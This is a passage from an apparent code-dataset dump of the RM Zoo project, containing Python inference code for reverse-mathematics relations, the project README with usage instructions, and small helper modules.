'->' and '-|>', affects '-|>'\ndef contrapositiveConjunction():\n #a X-|> b\n #WHEN\n # (a X-> c) AND (a X-|> b+c)\n \n r = False\n for c in principlesList:\n for b in principlesList:\n if b == c: continue\n \n bc = joinPrinciples(b,c)\n if bc is None: continue\n \n for a in principlesList:\n if a == b: continue\n \n if a == c: # Special-case\n reds = notImplies[a,bc]\n if reds == Reduction.none: continue\n \n for x in Reduction.list(reds):\n notImp = (x, u'-|>')\n \n aNotImpBC = (a, notImp, bc)\n \n r |= addFact(a, notImp, b,\n (aNotImpBC,), 1 + justComplexity[aNotImpBC])\n else:\n reds = implies[a,c] & notImplies[a,bc]\n if reds == Reduction.none: continue\n \n for x in Reduction.list(reds):\n notImp = (x, u'-|>')\n \n aImpC = (a, (x, u'->'), c)\n aNotImpBC = (a, notImp, bc)\n \n r |= addFact(a, notImp, b,\n (aImpC, aNotImpBC), 1 + justComplexity[aImpC] + justComplexity[aNotImpBC])\n return r\n\n#REDUNDANT\n# Uses 'c' and '-|>', affects '-|>'\ndef contrapositiveConservation(): \n #a RCA-|> b\n #WHEN\n # (a Fc c) AND (c RCA-|> b) AND (b has form F)\n notImp = (Reduction.RCA, u'-|>')\n \n r = False\n for c in principlesList:\n for b in principlesList:\n if b == c: continue\n \n if Reduction.isPresent(Reduction.RCA, notImplies[c,b]):\n formB = form[b]\n if formB == Form.none: continue\n \n cNotImpB = (c, notImp, b)\n refCplxCB = 2 + justComplexity[cNotImpB]\n \n for a in principlesList:\n if a == b or a == c: continue\n \n frms = conservative[a,c] & formB\n if frms == Form.none: continue\n \n for f in Form.list(frms):\n aConsC = (a, (f, u'c'), c)\n \n r |= addFact(a, notImp, b,\n (aConsC, cNotImpB, (b, u'form', f)), justComplexity[aConsC] + refCplxCB)\n return r\n\n#REDUNDANT\n# Uses 'c' and '->', affects 'c'\ndef liftConservation():\n r = False\n for c in 
principlesList:\n #a Fc b\n #WHEN\n # (c RCA-> a) AND (c Fc b) [aka \"Weaker principles prove less\"]\n for a in principlesList:\n if a == c: continue\n \n if Reduction.isPresent(Reduction.RCA, implies[c,a]):\n cImpA = (c, (Reduction.RCA, u'->'), a)\n refCplxCA = 1 + justComplexity[cImpA]\n \n for b in principlesList:\n if b == a or b == c: continue\n \n for f in Form.list(conservative[c,b]):\n fc = (f, u'c')\n cConsB = (c, fc, b)\n \n r |= addFact(a, fc, b,\n (cImpA, cConsB), refCplxCA + justComplexity[cConsB])\n \n #a Fc b\n #WHEN\n # (a Fc c) AND (b RCA-> c) [aka \"Stronger principles prove more\"]\n for b in principlesList:\n if b == c: continue\n \n if Reduction.isPresent(Reduction.RCA, implies[b,c]):\n bImpC = (b, (Reduction.RCA, u'->'), c)\n refCplxBC = 1 + justComplexity[bImpC]\n \n for a in principlesList:\n if a == b or a == c: continue\n \n for f in Form.list(conservative[a,c]):\n fc = (f, u'c')\n aConsC = (a, fc, c)\n \n r |= addFact(a, fc, b,\n (aConsC, bImpC), justComplexity[aConsC] + refCplxBC)\n return r\n\n#REDUNDANT\n# Uses '->' and '-|>', affects 'nc'\ndef definitionOfNonConservation():\n #a nFc b\n #WHEN\n # (a RCA-> c) AND (b RCA-|> c) AND (c has form F)\n r = False\n for c in principlesList:\n formC = form[c]\n if formC == Form.none: continue\n cForms = Form.list(formC)\n \n for a in principlesList:\n if a == c: continue\n \n if Reduction.isPresent(Reduction.RCA, implies[a,c]):\n aImpC = (a, (Reduction.RCA, u'->'), c)\n refCplxAC = 2 + justComplexity[aImpC]\n \n for b in principlesList:\n if b == a or b == c: continue\n \n if Reduction.isPresent(Reduction.RCA, notImplies[b,c]):\n bNotImpC = (b, (Reduction.RCA, u'-|>'), c)\n \n cplx = refCplxAC + justComplexity[bNotImpC]\n \n for f in cForms:\n r |= addFact(a, (f, u'nc'), b,\n (aImpC, bNotImpC, (c, u'form', f)), cplx)\n return r\n\n#REDUNDANT\n# Uses 'nc' and '->', affects 'nc'\ndef liftNonConservation():\n imp = (Reduction.RCA, u'->')\n \n r = False\n for c in principlesList:\n #a nFc b\n #WHEN\n # (a nFc c) AND (c RCA-> b) [aka \"Weaker principles prove less (contrapositive)\"]\n for b in principlesList:\n if b == c: continue\n \n if Reduction.isPresent(Reduction.RCA, implies[c,b]):\n cImpB = (c, imp, b)\n refCplxCB = 1 + justComplexity[cImpB]\n \n for a in principlesList:\n if a == b or a == c: continue\n \n for f in Form.list(nonConservative[a,c]):\n nFc = (f, u'nc')\n aNonConsC = (a, nFc, c)\n \n r |= addFact(a, nFc, b,\n (aNonConsC, cImpB), justComplexity[aNonConsC] + refCplxCB)\n \n #a nFc b\n #WHEN\n # (a RCA-> c) AND (c nFc b) [aka \"Stronger principles prove more (contrapositive)\"]\n for a in principlesList:\n if a == c: continue\n \n if Reduction.isPresent(Reduction.RCA, implies[a,c]):\n aImpC = (a, imp, c)\n refCplxAC = 1 + justComplexity[aImpC]\n \n for b in principlesList:\n if b == a or b == c: continue\n \n for f in Form.list(nonConservative[c,b]):\n nFc = (f, u'nc')\n cNonConsB = (c, (f, u'nc'), b)\n \n r |= addFact(a, nFc, b,\n (aImpC, cNonConsB), refCplxAC + justComplexity[cNonConsB])\n return r\n\ndef deriveInferences(quiet=False, verbose=False):\n start = timekeeper()\n if not quiet: eprint(u'Adding reflexivity facts..')\n addReflexivities()\n if not quiet: eprint(u'Making RCA trivial..')\n addRCABottom()\n if not quiet: eprint(u'Recording conjunctions...')\n definitionOfConjunction()\n if not quiet: eprint(u'Elapsed: {0:.6f} s\\n'.format(timekeeper() - start))\n \n start = timekeeper()\n if not quiet: eprint(u'Deriving positive facts:')\n n = 0\n eUpdated, iUpdated, cUpdated = True, True, True\n 
while eUpdated or iUpdated or cUpdated:\n        n += 1\n        eChanged, iChanged, cChanged = False, False, False\n        \n        if iUpdated or iChanged:\n            if not quiet: eprint(u'\\tExtracting equivalences...')\n            eChanged |= definitionOfEquivalence() # Uses '->', affects '<->'\n        if eUpdated or eChanged:\n            if not quiet: eprint(u'\\tTaking the transitive closure of equivalence...')\n            eChanged |= transitiveClosure(equivalent, u'<->', Reduction) # Uses '<->', affects '<->'\n        \n        if iUpdated or iChanged:\n            if not quiet: eprint(u'\\tTaking the transitive closure of implication...')\n            iChanged |= transitiveClosure(implies, u'->', Reduction) # Uses '->', affects '->'\n            if not quiet: eprint(u'\\tReverse-engineering implications of conjunctions...')\n            iChanged |= unifyOverConjunctions() # Uses '->', affects '->'\n        if (cUpdated or cChanged) or (iUpdated or iChanged):\n            if not quiet: eprint(u'\\tImplementing conservativity for implication...')\n            iChanged |= definitionOfConservation() # Uses 'c' and '->', affects '->'\n        \n        if cUpdated or cChanged:\n            if not quiet: eprint(u'\\tTaking the transitive closure of conservation facts...')\n            cChanged |= transitiveClosure(conservative, u'c', Form) # Uses 'c', affects 'c'\n        if (cUpdated or cChanged) or (iUpdated or iChanged):\n            if not quiet: eprint(u'\\tLifting conservation facts over implications...')\n            cChanged |= liftConservation() # Uses 'c' and '->', affects 'c'\n        \n        if verbose:\n            eprint(u'\\t\\tDuring iteration {0}:'.format(n))\n            if eChanged: eprint(u'\\t\\t\\tEquivalences updated.')\n            if iChanged: eprint(u'\\t\\t\\tImplications updated.')\n            if cChanged: eprint(u'\\t\\t\\tConservation facts updated.')\n            if not eChanged and not iChanged and not cChanged: eprint(u'\\t\\t\\tNothing updated.')\n        \n        eUpdated = eChanged\n        iUpdated = iChanged\n        cUpdated = cChanged\n    if not quiet:\n        eprint(u'Finished with positive facts.')\n        eprint(u'Elapsed: {0:.6f} s (with {1} repeats)\\n'.format(timekeeper() - start, n))\n    \n    start = timekeeper()\n    if not quiet: eprint(u'Deriving negative facts:')\n    n = 0\n    niUpdated, ncUpdated = True, True\n    while niUpdated or ncUpdated:\n        n += 1\n        niChanged, ncChanged = False, False\n        \n        if niUpdated or niChanged:\n            if not quiet: eprint(u'\\tApplying transitivity to non-implications...')\n            niChanged |= contrapositiveTransitivity(implies, u'->', notImplies, u'-|>', Reduction) # Uses '->' and '-|>', affects '-|>'\n            if not quiet: eprint(u'\\tSplitting non-implications over conjunctions...')\n            niChanged |= contrapositiveConjunction() # Uses '->' and '-|>', affects '-|>'\n            if not quiet: eprint(u'\\tImplementing conservativity for non-implication...')\n            niChanged |= contrapositiveConservation() # Uses 'c' and '-|>', affects '-|>'\n        \n        if ncUpdated or ncChanged:\n            if not quiet: eprint(u'\\tApplying transitivity to non-conservation facts...')\n            ncChanged |= contrapositiveTransitivity(conservative, u'c', nonConservative, u'nc', Form) # Uses 'c' and 'nc', affects 'nc'\n        if niUpdated or niChanged:\n            if not quiet: eprint(u'\\tExtracting non-conservation facts from non-implications...')\n            ncChanged |= definitionOfNonConservation() # Uses '->' and '-|>', affects 'nc'\n        if ncUpdated or ncChanged:\n            if not quiet: eprint(u'\\tLifting non-conservation facts over implications...')\n            ncChanged |= liftNonConservation() # Uses 'nc' and '->', affects 'nc'\n        \n        if verbose:\n            eprint(u'\\t\\tDuring iteration {0}:'.format(n))\n            if niChanged: eprint(u'\\t\\t\\tNon-implications updated.')\n            if ncChanged: eprint(u'\\t\\t\\tNon-conservation facts updated.')\n            if not niChanged and not ncChanged: 
eprint(u'\\t\\t\\tNothing updated.')\n \n niUpdated = niChanged\n ncUpdated = ncChanged\n if not quiet:\n eprint(u'Finished with negative facts.')\n eprint(u'Elapsed: {0:.6f} s (with {1} repeats)\\n'.format(timekeeper() - start, n))\n\ndef getDatabase():\n return {'version': DatabaseVersion,\n 'principles': principles,\n 'implication': (implies, notImplies),\n 'conservation': (conservative, nonConservative),\n 'form': form,\n 'primary': (primary, primaryIndex),\n 'justify': justify}\n\ndef setDatabase(database):\n if database['version'] != DatabaseVersion:\n raise VersionError(database['version'], DatabaseVersion)\n \n global principles, principlesList\n principles = database['principles']\n principlesList = sorted(principles)\n \n global implies, notImplies\n implies, notImplies = database['implication']\n \n global conservative, nonConservative\n conservative, nonConservative = database['conservation']\n \n global form\n form = database['form']\n \n global primary, primaryIndex\n primary, primaryIndex = database['primary']\n \n global justify\n justify = database['justify']\n \n global justComplexity\n justComplexity = {}\n def rebuildComplexity(fact):\n try:\n return justComplexity[fact]\n except KeyError:\n r = 1\n \n a,op,b = fact\n if op != u'form':\n jst = justify[fact]\n if not isString(jst):\n r += sum(rebuildComplexity(f) for f in jst)\n \n justComplexity[fact] = r\n return r\n for fact in justify:\n rebuildComplexity(fact)\n\ndef dumpDatabase(databaseName, quiet=False):\n if not quiet: eprint(u'Facts known: {0:,d}\\n'.format(len(justify)))\n \n start = timekeeper()\n if not quiet: eprint(u'Dumping updated database to binary file...')\n with open(databaseName, mode='wb') as databaseFile:\n pickledDatabase = pickle.dumps(getDatabase(), protocol=2)\n compressedDatabase = zlib.compress(pickledDatabase)\n databaseFile.write(compressedDatabase)\n \n if not quiet: eprint(u'Elapsed: {0:.6f} s\\n'.format(timekeeper() - start))\n\ndef loadDatabase(databaseName, quiet=False):\n with open(databaseName, mode='rb') as databaseFile:\n compressedDatabase = databaseFile.read()\n pickledDatabase = zlib.decompress(compressedDatabase)\n setDatabase(pickle.loads(pickledDatabase))\n\nfrom optparse import OptionParser, OptionGroup\ndef main():\n absoluteStart = timekeeper()\n eprint(u'\\nRM Zoo (v{0})\\n'.format(Version))\n \n parser = OptionParser(u'Usage: %prog [options] results [database_title]', version=u'%prog {0} ({1})'.format(Version, Date))\n \n parser.set_defaults(quiet=False, verbose=False)\n \n parser.add_option('-q', action='store_true', dest='quiet',\n help = u'Suppress progress/timing indicators.')\n parser.add_option('-v', action='store_true', dest='verbose',\n help = u'Report additional execution information.')\n \n (options, args) = parser.parse_args()\n if len(args)>2:\n parser.error(u'Too many arguments provided.')\n if len(args)<1:\n parser.error(u'No results file specified.')\n \n if options.quiet and options.verbose:\n parser.error(u'Options -q and -v are incompatible.')\n \n import os\n resultsFile = args[0]\n if len(args) > 1:\n databaseTitle = args[1]\n else:\n eprint(u'No database title specified; defaulting to \"database\".')\n databaseTitle = 'database.dat'\n \n if os.path.splitext(databaseTitle)[1] == '':\n databaseName = databaseTitle + os.extsep + 'dat'\n else:\n databaseName = databaseTitle\n \n if not os.path.exists(resultsFile):\n parser.error(u'Results file \"{0}\" does not exist.'.format(resultsFile))\n \n with open(resultsFile, encoding='utf-8') as f:\n 
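# Feed the whole results file to the parser; inference and the compressed\n        # database dump happen after this block closes the file.\n        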
parseResults(f.read(), options.quiet)\n deriveInferences(quiet=options.quiet, verbose=options.verbose)\n dumpDatabase(databaseName, options.quiet)\n if not options.quiet: eprint(u'Total elapsed time: {0:.6f} s'.format(timekeeper() - absoluteStart))\n \n if options.verbose:\n try:\n report = []\n report.append(u'\\tReduction.list: {0}'.format(Reduction.list.cache_info()))\n report.append(u'\\tForm.list: {0}'.format(Form.list.cache_info()))\n eprint(u'\\nCache report: ')\n eprint('\\n'.join(report))\n except AttributeError:\n pass\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.7473697662353516, "alphanum_fraction": 0.7594210505485535, "avg_line_length": 65.4533920288086, "blob_id": "1cf2369b1b4ad89c9717427958048614fd84cece", "content_id": "d467ef2c86ff064ef2017929c7c4ec909ab8e198", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 15688, "license_type": "permissive", "max_line_length": 642, "num_lines": 236, "path": "/README.md", "repo_name": "TonichaC/rmzoo", "src_encoding": "UTF-8", "text": "# RM Zoo\n\nThe Reverse Mathematics Zoo is a program to help organize relations among various mathematical principles, particularly those that fail to be equivalent to any of the big five subsystems of second-order arithmetic. Its primary goal is to make it easier to see known results and open questions, and thus hopefully to serve as a useful tool to researchers in the field. As a secondary goal, the Zoo should provide an interactive annotated bibliography of the field, collecting results in a standard machine-readable format.\n\nThe present version of the RM Zoo is a complete rewrite of the original, and features many improvements. The program has been heavily optimized and extended; the run time should generally be faster, and more true facts should be inferred from most starting results files. In addition, the RM Zoo can now handle implications, reducibilities (including both Weihrauch reducibility and computable reducibility), and conservation facts.\n\nThe program is divided into two parts: a database updater/compiler, which derives all inferences from the provided results file, and a database query system, which can answer specific questions about reverse-mathematical relations or produce diagrams on request.\n\nUnder the reverse-mathematical interface, the Zoo is actually a specialized inference engine, designed to reason with facts of the form \"a implies b in context Q\" (implication facts), \"if a implies p, and p has form F, then b implies p\" (conservation facts), or the negations thereof.\n\n## Installation\n\nTo run the RM Zoo, you will need to install a distribution of Python, version 2.7 or later. 
(The Zoo will perform best if run in either [PyPy2.7](http://pypy.org/index.html) or [Python 3.4+](https://www.python.org/).)\n\nYou will also need the [Pyparsing](http://pyparsing.wikispaces.com/) module.\n\nIf not using Python 3.4+, you will need to install the [enum34](https://bitbucket.org/stoneleaf/enum34) module, and if not using Python 3.2+, you will also need the [repoze.lru](https://github.com/repoze/repoze.lru) module.\n\nTo install each of these modules, run the appropriate commands below:\n```\npip install pyparsing\npip install enum34\npip install repoze.lru\n```\n\nTo view/render the diagrams produced by the Zoo, you will need to install [Graphviz](http://www.graphviz.org/), or another program capable of reading DOT files.\n\n## Usage\n\nThe RM Zoo consists of two Python scripts, `rmupdater.py` and `rmzoo.py`.\n\n### rmupdater\n\n`rmupdater.py` compiles results files into databases of known facts, and is typically run as follows:\n\n- `python rmupdater.py [results file]`,\n\nwhere `[results file]` is a text file containing facts; the results file included in this distribution is `byPaper.txt`. If using multiple results files (for testing purposes), you may keep them in separate databases by adding a database title:\n\n- `python rmupdater.py [results file] [database title]`\n\nFor example, one would typically run\n\n- `python rmupdater.py byPaper.txt`;\n\nIf maintaining an alternate results file in `test.txt`, one might separately run the command\n\n- `python rmupdater.py test.txt testDatabase`.\n\n### rmzoo\n\n`rmzoo.py` then takes the database built by `rmupdater.py`, and carries out various tasks as controlled by its options. The basic command is\n\n- `python rmzoo.py [options]`;\n\nhowever, if you need to specify a database title, add it to the command as follows:\n\n- `python rmzoo.py [database title] [options]`\n\n---\n\nTo query the database for a fact (which will determine whether it is known or contradicted, and give the justification in either case), run the command\n\n- `python rmzoo.py -q "[fact]"`.\n\nFor example,\n\n- `python rmzoo.py -q "RT22 -> CRT22"`\n\nwill print a justification of the fact that **RT<sup>2</sup><sub>2</sub>** implies **CRT<sup>2</sup><sub>2</sub>** over **RCA<sub>0</sub>**.\n\n---\n\nTo generate a diagram from the database, instead run\n\n- `python rmzoo.py [diagram options] > [destination]`,\n\nwhere `[destination]` is a DOT file. The `[diagram options]` **must** include one or more of the following:\n\n- `-i`: show implications as black arrows;\n- `-n`: show non-implications as red arrows;\n- `-f`: color-code principles by their syntactic form; currently, this uses a pink box for Π<sup>1</sup><sub>1</sub> principles, and a cyan box for restricted Π<sup>1</sup><sub>2</sub> principles. Other forms do not yet have a color code.\n- `-c`: show conservation facts, using color-coded arrows (as for the forms) to represent each form of conservation;\n- `-w`: show the weakest open implications as green arrows;\n- `-s`: show the strongest open implications as green arrows.\n\nIn addition, the options may include any of the following:\n\n- `-o`: show facts that hold in ω-models;\n- `-t [REDUCIBILITY]`: show facts relative to implications over the given REDUCIBILITY (options include sW, W, gW, sc, c, w, and RCA);\n- `-p`: show only one primary principle from each group of equivalent principles;\n- `-r "[CLASS]"`: restrict the diagram to just the principles contained between the quotation marks (and any sub-principles of conjunctions in the list). 
For example, the option `-r \"RT22 COH+WKL SRT22 RCA\"` will show only relations between the principles **RT22**, **COH+WKL**, **SRT22**, **RCA<sub>0</sub>**, **COH**, and **WKL**.\n\nFor instance,\n\n- `python rmzoo.py -i -o -w > diagram.dot`\n\nwill produce a diagram of all implications between principles that hold in ω-models, along with the weakest open implications (in ω-models). Generally speaking, the more options that are selected, the more information is shown on the diagram; this tends to make it harder to read.\n\nIt would probably be of very limited use to select *all* the options, for instance.\n\n## Credits\n\nThe RM Zoo was originally developed by Damir Dzhafarov, inspired by Joseph S. Miller's command-line version of the Computability Menagerie. Recently, the Zoo has been largely rewritten by Eric Astor to improve performance, expand the library of available inference rules, and move to a more maintainable/upgradeable architecture.\n\nMany people have helped with the RM Zoo, by commenting on the code, contributing facts, suggesting new features, or just expressing their interest. Thanks in particular to David Belanger, Peter Cholak, Stephen Flood, Denis Hirschfeldt, Steffen Lempp, Joe Miller, Antonio Montalbán, Carl Mummert, Ludovic Patey, Sam Sanders, and Ted Slaman.\n\n## Contributing\n\nContributions and/or feedback are, of course, welcome! If you are comfortable working with GitHub, the best way to contribute is as follows:\n\n1. Fork the code.\n2. Create your feature branch: `git checkout -b my-new-feature`\n3. Commit your changes: `git commit -am 'Add some feature'`\n4. Push to the branch: `git push origin my-new-feature`\n5. Submit a pull request.\n\nOtherwise, don't hesitate to send an e-mail or other message.\n\n### Results\n\nThe results file is a simple text file containing relations between reverse-mathematical principles. This is then compiled by the Zoo's updater to create its database, which is then used by the Zoo to generate its various outputs (whether DOT files or text responses).\n\n#### Names\n\nPrinciples should be named by **simple plaintext alphanumeric strings** that resemble their normal acronyms in the literature; for example, we use `RT22` for Ramsey's theorem for pairs (and 2 colors). Do not use TeX in the names of principles (as in `RT^2_2` or `\\mathsf{RT}^2_2`); this will make the diagrams harder to read, as DOT files have no TeX support, and can sometimes cause errors.\n\n#### Relations\n\nRelations between principles are given by using various operators. For instance:\n\n- `RT22 -> COH`\n\nindicates an **implication** provable in **RCA<sub>0</sub>**. By itself, however, this would generate an error; all facts must include a **justification**. To justify this fact, one would instead write:\n\n- `RT22 -> COH \"Mileti (2004) [Claim A.1.3], and independently Jockusch and Lempp\"`\n\nThese justifications are used by the Zoo to keep track of why the facts it derives are true, and as such are important for maintaining a usable database. For simplicity, justifications should also be plaintext; if a principle needs to be mentioned, the same acronyms as for relations should be used. To keep the results file clean, please use the justification format: \"Author 1, Author 2, and Author 3 (year) \\[result citation\\]\". 
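(For instance, \"Hirschfeldt and Shore (2007) [Proposition 4.4]\", which appears again below, is a justification in exactly this shape: authors, year, and the precise result cited.) 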
If possible, citations should be to the authoritative published version of the paper, falling back to an arXiv citation only when the authoritative version is not yet available.\n\n**Non-implications** (i.e., implications known *not* to be provable in **RCA<sub>0</sub>**), can be entered similarly, using the operator `-|>`; for example,\n\n- `RT22+WKL -|> ACA \"Seetapun and Slaman (1995) [Theorem 3.1]\"`\n\nHowever, this result said more than this; Seetapun and Slaman specifically constructed an omega-model of **RT22+WKL** in which **ACA** failed. In general, one can represent implications and non-implications over omega-models by prepending `w` before an operator. Thus, one can more accurately write the previous result as\n\n- `RT22+WKL w-|> ACA \"Seetapun and Slaman (1995) [Theorem 3.1]\"`\n\nand might also write\n\n- `COH w-> StCOH \"Hirschfeldt and Shore (2007) [Proposition 4.4]\"`\n\nto represent this implication which, while not necessarily true in all models of **RCA<sub>0</sub>**, holds over all omega models. The Zoo is programmed to understand that `->` is stronger than `w->`, and thus that `w-|>` is stronger than `-|>`.\n\nFurthermore, the Zoo now supports results from the study of computable and Weihrauch reducibilities, using the operators `<=` and `</=`, and appending an abbreviation of the relevant reducibility. For example, the following facts could be included in the results file:\n\n- `DNR <=_c SRT22 \"Hirschfeldt, Jockusch, Kjos-Hanssen, Lempp, and Slaman (2008) [follows from proof of Theorem 2.3]\"`\n- `COH </=_W SRT22 \"Dzhafarov (to appear) [Corollary 4.5]\"`\n\nThe supported reducibilities are:\n\n- strong Weihrauch reducibility (`sW`)\n- Weihrauch/uniform reducibility (`W`)\n- generalized Weihrauch reducibility (`gW`)\n- strong computable reducibility (`sc`)\n- computable reducibility (`c`)\n- generalized computable reducibility (`gc`) \\[also known as reducibility over omega-models (`w`)\\]\n\nThe Zoo understands the relations between these reducibilities, and between them and the above notions of implication. Thus, it can conclude from the above examples that `SRT22 w-> DNR` and that `COH </=_sW SRT22`.\n\n##### Equivalences and Primary Principles\n\nThe Zoo can handle cycles without difficulty. For example, it will know that the facts\n\n- `StCOH -> StCADS`\n- `StCADS -> StCOH`\n\ntogether indicate that the principles **StCOH** and **StCADS** are **equivalent** over **RCA<sub>0</sub>**, and will act accordingly. For instance, if rendering a diagram, the Zoo will pick one of the two principles to treat as 'primary', in the sense that implications and non-implications will only be shown going to and from the primary principle; this reduces the mess, and keeps the diagram more readable. Of course, the Zoo may occasionally pick the \"wrong\" primary principle; for instance, we probably want **StCOH** to be considered primary over **StCADS**. Since the Zoo has no way of knowing that on its own, we can include the fact\n\n- `StCOH is primary`\n\nin our results file, and ensure that the Zoo considers **StCOH** to be the primary principle. (Note that our choice of primary principles is given no justification; in fact, by the standards of the results file, it *cannot* be justified.) The order in which this is done matters. For example, if we switch to thinking about omega models, **StCOH** will be equivalent to **COH**, but we probably want **COH** to be considered primary in this case. 
Entering\n\n- `COH is primary`\n\n**earlier** (i.e., \"higher up\") in the results file will achieve the desired result.\n\nPrinciples can also be declared equivalent by use of dedicated operators, included for convenience. Writing\n\n- `StCOH <-> StCADS`\n\nwill produce the same result as including both of the two separate implications. (**Warning:** prepending a `w` to `<->` does work, but does not merely indicate an equivalence that holds over omega models; it in fact asserts that both halves of the implication hold in omega models. One can use the operator `<=>` in a similar way, subject to the same caveat.)\n\n#### Syntactic Forms and Conservation Facts\n\nThe Zoo also understands **syntactic forms** and **conservation facts** relating reverse-mathematical principles. Specifically, it understands the syntactic forms\n\n- `Sig02`, `Pi02`, `Sig03`, `Pi03`, `Sig04`, and `Pi04`: three levels of the arithmetic hierarchy\n- `Pi11`, `Pi12`, and `Pi13`: the first three universal levels of the analytic hierarchy\n- `uPi03`: Pi03 with a single universally-quantified set parameter; defined as \"twiddle-Pi<sup>0</sup><sub>3</sub>\" in Patey and Yokoyama (preprint)\n- `rPi12`: restricted Pi12 statements, as defined in Hirschfeldt and Shore (2007) \\[Corollary 2.21\\]\n\nWe can thus enter\n\n- `RT22 form rPi12`\n- `BSig2 form Pi11`\n\nto indicate that the given principles have the given forms. (Note that these statements are **unjustified**.)\n\nTo indicate that one principle is conservative over another for consequences of a given form (that is to say, the first proves no more consequences of that form than the second), we can add results such as:\n\n- `AMT+BSig2 Pi11c BSig2 \"Hirschfeldt, Shore, and Slaman (2009) [Corollary 4.5]\"`\n- `AMT rPi12c RCA \"Hirschfeldt, Shore, and Slaman (2009) [Corollary 3.15]\"`\n\nTo indicate that one principle is **not** conservative over another, prepend an `n` before the conservation operator. For instance, we might add the result\n\n- `RT22 nPi04c RCA \"Seetapun and Slaman (1995) [Theorem 3.6]\"`\n\nConservation and non-conservation facts must, again, be justified. The Zoo understands the connections between conservation facts and implications, and will use them to extract more relations between the known principles.\n\n#### Compound Principles (i.e., Conjunctions)\n\nAs the reader may have noted above, the Zoo also understands compound principles; that is, principles that are conjunctions of other principles. For instance, if we add\n\n- `SRT22+COH <-> RT22`\n\nas a fact in the results file, the Zoo will know that `COH+SRT22` is a compound principle, denoting the conjunction of `COH` and `SRT22`. It will add any component principles to its internal list, and will automatically understand the relations between the compound principle and its components.\n\n#### Organization and Formatting\n\nPlease note that any line in the results file starting with a `#` symbol is ignored, and considered to be a comment for human readers.\n\nIf contributing to the results file, please take note of the organization and formatting used therein; we have organized the results by publication, arranged by publication year when possible (with the noted exception of Simpson's \"Subsystems of Second-Order Arithmetic\" \\[also known as SOSOA\\], which is listed first). 
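A typical entry in the results file therefore looks something like the following sketch (the fact line is taken from the examples above; the citation comment is illustrative):\n\n```\n# Seetapun, David and Slaman, Theodore A., \"On the strength of Ramsey's theorem\",\n# Notre Dame Journal of Formal Logic 36 (1995), no. 4, 570-582.\nRT22+WKL w-|> ACA \"Seetapun and Slaman (1995) [Theorem 3.1]\"\n```\n\n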
Each publication's results should be preceded by a comment containing a full authoritative citation, including (if at all possible) a URL and DOI for the authoritative published version.\n\nContributions to the results file are extremely welcome. For example, if anyone wants to transcribe the relevant results of Simpson's SOSOA into our format, the maintainers would be eternally grateful! (For context, please note that this textbook is over 450 pages long.)\n\n## License\n\nThe RM Zoo has been placed under the MIT license; in plain English, you can do whatever you want with it, including redistribution and creation of derivative works, as long as attribution and the appropriate license information remain. For details, please see the LICENSE file.\n" }, { "alpha_fraction": 0.646034836769104, "alphanum_fraction": 0.6479690670967102, "avg_line_length": 23.619047164916992, "blob_id": "3bfe288f065d124568ecf4d49c278c0f44593992", "content_id": "22029037e80654d6c4521d61f88c66db6114bbe5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 517, "license_type": "permissive", "max_line_length": 58, "num_lines": 21, "path": "/version_guard.py", "repo_name": "TonichaC/rmzoo", "src_encoding": "UTF-8", "text": "import sys\nif sys.version_info >= (3,):\n def isString(value):\n return isinstance(value, str)\nelse:\n def isString(value):\n return isinstance(value, basestring)\n\n# Mock \"lru_cache\"; actually just a pass-through decorator\ndef lru_cache(*args, **kwargs):\n def empty_decorator(f):\n f.__wrapped__ = f\n return f\n return empty_decorator\ntry:\n from functools import lru_cache\nexcept ImportError:\n try:\n from repoze.lru import lru_cache\n except ImportError:\n pass\n" }, { "alpha_fraction": 0.5370121002197266, "alphanum_fraction": 0.5464333891868591, "avg_line_length": 29.547945022583008, "blob_id": "12fe5e561a010a6eba832e3f356246f2d1ec5fcf", "content_id": "538c4cf08ad4caf414f75f808f6e47bb9254728a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2229, "license_type": "permissive", "max_line_length": 142, "num_lines": 73, "path": "/renderJustification.py", "repo_name": "TonichaC/rmzoo", "src_encoding": "UTF-8", "text": "from __future__ import print_function, unicode_literals\n\nfrom rmBitmasks import Form, Reduction\n\nfrom version_guard import lru_cache, isString\n\n_justLineMarker = u'*'\n_justIndentMarker = u'@'\njustMarker = _justLineMarker + _justIndentMarker\n_justIndented = justMarker + _justIndentMarker\n_justFormat = justMarker + u'{0}: '\ndef indentJust(jst):\n return jst.replace(justMarker, _justIndented)\n\n@lru_cache(maxsize=1024)\ndef printOp(op):\n if isString(op):\n return op\n \n opCtx, opCore = op\n try:\n opCtx = opCtx.name\n except AttributeError:\n pass\n \n if opCore == u'nc':\n return u'n{0}c'.format(opCtx)\n elif opCore in (u'=>', u'=/>', u'<=', u'</=', u'<=>'):\n return u'{1}_{0}'.format(opCtx, opCore)\n else:\n return u'{0}{1}'.format(opCtx, opCore)\n\ndef printFact(a, op, b):\n if op == u'form':\n b = b.name\n elif op[0] in (Reduction.sW, Reduction.W, Reduction.gW, Reduction.sc, Reduction.c): # Reducibility fact, not implication fact\n if op[1] == u'->':\n op = (op[0], u'<=')\n a,b = b,a\n elif op[1] == u'-|>':\n op = (op[0], u'</=')\n a,b = b,a\n elif op[1] == u'<->':\n op = (op[0], u'<=>')\n return u'{0} {1} {2}'.format(a, printOp(op), b)\n\nprintedJustify = {}\ndef printJustification(fact, justify, formatted=True):\n a,op,b = fact\n \n r 
= ''\n try:\n r = printedJustify[fact]\n except KeyError:\n if op == u'form':\n r = justMarker + printFact(*fact)\n else:\n try:\n jst = justify[fact]\n except KeyError:\n raise Exception(u'ERROR: Referenced fact \"{0}\" not justified!'.format(printFact(*fact)))\n \n if isString(jst):\n r = _justFormat.format(printFact(*fact)) + jst\n else:\n r = _justFormat.format(printFact(*fact)) \\\n + u''.join((_justIndented+f if isString(f) else indentJust(printJustification(f, justify, formatted=False))) for f in jst)\n printedJustify[fact] = r\n \n if formatted:\n return r.replace(_justLineMarker, u'\\n').replace(_justIndentMarker, u' ')\n else:\n return r" }, { "alpha_fraction": 0.5372593998908997, "alphanum_fraction": 0.5396416783332825, "avg_line_length": 34.452701568603516, "blob_id": "59479c7df654fcb04ccbd8b5a8e71c3161562d12", "content_id": "b590282d37e7551ec5229b985e54b79f73be13e9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10494, "license_type": "permissive", "max_line_length": 128, "num_lines": 296, "path": "/databaseToJSON.py", "repo_name": 